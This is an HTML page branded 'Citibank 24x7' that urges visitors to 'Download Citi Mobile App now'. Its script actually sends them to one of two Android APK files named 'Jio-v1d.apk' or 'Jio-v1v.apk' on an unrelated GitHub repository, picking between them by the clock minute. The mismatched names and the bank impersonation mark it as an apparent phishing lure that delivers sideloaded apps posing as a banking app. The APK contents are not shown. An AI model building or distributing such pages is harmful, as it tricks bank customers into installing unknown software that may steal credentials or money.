<html><head><meta name="viewport" content="width=device-width, initial-scale=1.0">


    <title>Download</title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.dabavanu {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:hover {
	background-color:#315cbb;
}
.dabavanusw {
	background-color:#315cbb;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #315cbb;
}
.dabavanu:active {
	position:relative;
	top:1px;
}

    </style>
<script>
function clik() 
{
    var m = new Date().getMinutes(); 
	if(m%2==0)
	{
		window.location="https://github.com/j4ghub/apks/raw/main/25gb/full/Jio-v1d.apk"; 
	}
	else
	{
		window.location="https://github.com/j4ghub/apks/raw/main/25gb/full/Jio-v1v.apk";
	}
}
</script></head>

<body>
<center>
    
        <img src="https://i.postimg.cc/yxZzd5Sz/citibank.png" height="140">
        <h1>Citibank 24x7</h1><h3>
      <br>
Download Citi Mobile App now !!<br><br>
<br>
</h3>
        <div onclick="clik()" class="dabavanu" style="background-color: 39c;">Download Now


        


    </div>
</center>

</body></html>